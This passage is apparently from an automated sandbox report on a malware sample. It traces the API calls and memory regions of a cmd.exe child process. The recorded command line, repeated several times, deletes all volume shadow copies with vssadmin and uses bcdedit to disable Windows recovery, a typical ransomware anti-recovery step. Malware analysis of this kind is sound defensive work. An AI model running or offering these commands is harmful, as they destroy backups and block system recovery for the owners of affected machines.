(penv=0x2838d0) returned 1 [0178.382] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ee74 | out: lpAttributeList=0x14ee74) [0178.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.382] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.382] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.382] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.383] SetConsoleInputExeNameW () returned 0x1 [0178.383] GetConsoleOutputCP () returned 0x1b5 [0178.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.383] exit (_Code=0) Process: id = "322" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "308" os_parent_pid = "0xd0c" cmd_line = "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24652 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24653 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24654 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24655 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 24656 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24657 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24658 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24659 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24660 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24661 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24757 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24758 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24759 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24760 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24761 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 24762 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24763 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24764 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24765 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24766 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24767 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24768 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24769 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24770 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24771 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24772 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24773 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24774 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24775 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24776 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 24777 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 24778 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 24779 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 24780 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 24781 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 436 os_tid = 0xb04 [0178.191] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfee4 | out: lpSystemTimeAsFileTime=0x1cfee4*(dwLowDateTime=0x9fed80a0, dwHighDateTime=0x1d440a9)) [0178.191] GetCurrentProcessId () returned 0xb68 [0178.191] GetCurrentThreadId () returned 0xb04 [0178.191] GetTickCount () returned 0x33957 [0178.191] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfedc | out: lpPerformanceCount=0x1cfedc*=23498015769) returned 1 [0178.192] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0178.192] __set_app_type (_Type=0x1) [0178.192] __p__fmode () returned 0x76b331f4 [0178.192] __p__commode () returned 0x76b331fc [0178.192] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0178.192] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0178.192] GetCurrentThreadId () returned 0xb04 [0178.192] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb04) returned 0x38 [0178.192] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.192] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0178.193] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.193] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.193] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfe74 | out: phkResult=0x1cfe74*=0x0) returned 0x2 [0178.193] VirtualQuery (in: lpAddress=0x1cfeab, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.193] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfe44, dwLength=0x1c | out: lpBuffer=0x1cfe44*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0178.193] GetConsoleOutputCP () returned 0x1b5 [0178.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.193] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0178.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.193] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0178.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.193] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.194] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.194] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.194] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.194] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.194] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0178.194] GetEnvironmentStringsW () returned 0x2b01a0* [0178.194] FreeEnvironmentStringsW (penv=0x2b01a0) returned 1 [0178.194] GetEnvironmentStringsW () returned 0x2b01a0* [0178.194] FreeEnvironmentStringsW (penv=0x2b01a0) returned 1 [0178.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cede4 | out: phkResult=0x1cede4*=0x40) returned 0x0 [0178.194] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0xc8, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.194] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.194] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x0, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegCloseKey (hKey=0x40) returned 0x0 [0178.195] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cede4 | out: phkResult=0x1cede4*=0x40) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x40, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x1, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x0, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x9, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x4, lpData=0x1cedf0*=0x9, lpcbData=0x1cede8*=0x4) returned 0x0 [0178.195] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedec, lpData=0x1cedf0, lpcbData=0x1cede8*=0x1000 | out: lpType=0x1cedec*=0x0, lpData=0x1cedf0*=0x9, lpcbData=0x1cede8*=0x1000) returned 0x2 [0178.195] RegCloseKey (hKey=0x40) returned 0x0 [0178.195] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638d [0178.195] srand (_Seed=0x5b88638d) [0178.195] GetCommandLineW () returned="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" [0178.195] GetCommandLineW () returned="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" [0178.195] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0178.196] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0178.196] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.196] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.196] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.196] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0178.196] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0178.196] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0178.196] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0178.196] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0178.196] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0178.196] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0178.196] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0178.196] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0178.196] GetEnvironmentStringsW () returned 0x2b22f0* [0178.196] FreeEnvironmentStringsW (penv=0x2b22f0) returned 1 [0178.196] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.196] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.196] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0178.196] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0178.196] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0178.196] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0178.196] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0178.196] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0178.196] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0178.197] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0178.197] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfbb0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0178.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1cfbb0, lpFilePart=0x1cfbac | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cfbac*="system32") returned 0x13 [0178.197] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0178.197] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1cf92c | out: lpFindFileData=0x1cf92c) returned 0x2b0980 [0178.197] FindClose (in: hFindFile=0x2b0980 | out: hFindFile=0x2b0980) returned 1 [0178.197] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1cf92c | out: lpFindFileData=0x1cf92c) returned 0x2b0980 [0178.197] FindClose (in: hFindFile=0x2b0980 | out: hFindFile=0x2b0980) returned 1 [0178.197] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0178.197] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0178.197] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0178.198] GetEnvironmentStringsW () returned 0x2b01a0* [0178.198] FreeEnvironmentStringsW (penv=0x2b01a0) returned 1 [0178.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0178.198] GetConsoleOutputCP () returned 0x1b5 [0178.198] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.198] GetUserDefaultLCID () returned 0x409 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfcf0, cchData=128 | out: lpLCData="0") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfcf0, cchData=128 | out: lpLCData="0") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfcf0, cchData=128 | out: lpLCData="1") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0178.199] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0178.200] GetConsoleTitleW (in: lpConsoleTitle=0x2a0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.201] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.201] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0178.201] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0178.201] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0178.202] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0178.202] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0178.202] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0178.202] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0178.202] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0178.202] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0178.202] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0178.204] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0178.205] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0178.205] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0178.205] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0178.205] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0178.205] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0178.205] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0178.207] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0178.207] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0178.207] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0178.207] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0178.207] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0178.207] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0178.207] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0178.209] GetConsoleTitleW (in: lpConsoleTitle=0x1cf984, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.209] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe")) returned 0x20 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0178.211] _wcsicmp 